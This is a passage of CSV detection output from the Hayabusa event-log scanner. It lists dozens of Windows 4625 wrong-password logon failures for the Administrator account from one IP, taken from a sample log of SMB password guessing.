Password,User: Administrator | Type: 3 | Computer: 9g3PO3jofnySl92G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.176 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TRndfQmPYuhV0Ri | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.204 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yyJOdaks4B1sKMDv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.252 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IB3OSmcFx5TUiiJX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.309 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lo3Ex40dkIeO53HF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.352 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AkzDG8QOM2cxbokF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.395 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YoMf36ZXJBLnYxtc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.436 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5izPIefHqDDWNDlu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.476 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z9o4f1XvvcVXBNwL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.521 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IjCR48ZJFyEhzrYI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.556 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mUV9i4O2gapcC01d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.608 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJzGAMQCvJBFOUPq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.645 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fyyu0x6I29R2J10Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.687 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8lCe1shqSs0xNwAJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.728 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ipZAMvm56d5mE9Fc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.774 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XX9N7jodTuEYBCSE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.814 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h5DBFGpzfJJ7gYV1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.848 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fQ3qTwcWkXJDuXDI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.889 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TOfkvLSo2HuhMtvk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.940 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y9DQUhPQHvvwAO0C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.990 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yao1JM0tSFv5IHnL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.037 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NXGm63wiZz3ZYFb9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.077 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: izvPgZCO2GRVLhId | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.119 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iI9zO2o7jd922pfK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.164 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UnAGy86My6hVwt4J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.208 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HhFTzONSVEziRtgq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.251 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdEv4ooC8AApqU1T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.292 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TxFGRBKVK732Aeu4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.336 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ITg8QH90LKkAQMLL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.377 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E8YKCN2uxmJtYxdW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.411 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lcVIqrTQbNLFW7Cr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.449 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: taZx68l1ci0i2XB0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.487 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Jjy0gZhZCc9dVGd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.525 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S1DxOWcNytmxHfxl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.555 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JGRFWos3MJeQ0oAr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.593 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I3YXVTiQAGbf57TH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.629 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eWNsBwoGd36krY2U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.668 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HIobpWCoOHdD76lL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.704 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W91ruUEdXwRcMxVB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.743 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6PEs7fp97cYFf4vx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.781 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hQelUX0kwLfpJnr0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.824 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t88CBspQqbiO1IPc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.864 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zELW2Upo3jRCIqJk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.900 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QfcyJGLYmu93JBIL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.940 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3t2nKPZHZvcXM3QA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.980 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oiDRonqdEM2YJvz9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.012 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wJPF4GUypkDkTz56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.060 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cd5YRVIoXx8LoYpK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.106 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H49I2Xp2Gz1Jj0Wh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.143 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZMSWWzskoRfYBGny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.190 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GLm2PolKMBsYkPnN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.280 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ZjHWhG2rXzYWskz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.325 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FOZzVedHYODB5Yvd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.372 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xVaRybjI4HdZV0Zs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.411 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tTcl30MvvycjFcQb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.449 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fVZqbCr9EwmV4gNE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.504 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zVwhii0TVmCkpDI0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.547 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Tx04CPPVa6WYY9G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.584 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gHyefIGqhIIy3ZI9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.627 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wrietoh4wgXcEvNd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.668 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9WW0Y5PW2JfCCdyR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.704 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tmXsMJ0ELK4qiNY6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.742 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yeftUqriSoxCgmDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.769 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 60JE9WQQ8N00j65B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.816 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r0rt2yVAEH6V4IIS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.852 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pay98C2Gr1di7qQd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.881 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8TyPDYm9QCAmqj7h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.927 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Dw3iK7DQMVXy8LW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:30.977 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BMuO0QEkxpKRv4Vl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.016 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RaHECaQDXCXQc9Xw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.060 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ewXT2VcARiaNLIxJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.110 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dGSTrm4AOojs7So0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.148 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wVTBSk0Q65LkaTqg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.209 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NjFN51w3T4VwuWa5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.248 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KG7a88h48ZEyOuYw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.292 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6ksKuTSGukc5em3B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.336 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tPEMcGV6ZR92sWNY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.369 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iBQ6sKrRjb7BsySN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:31.421 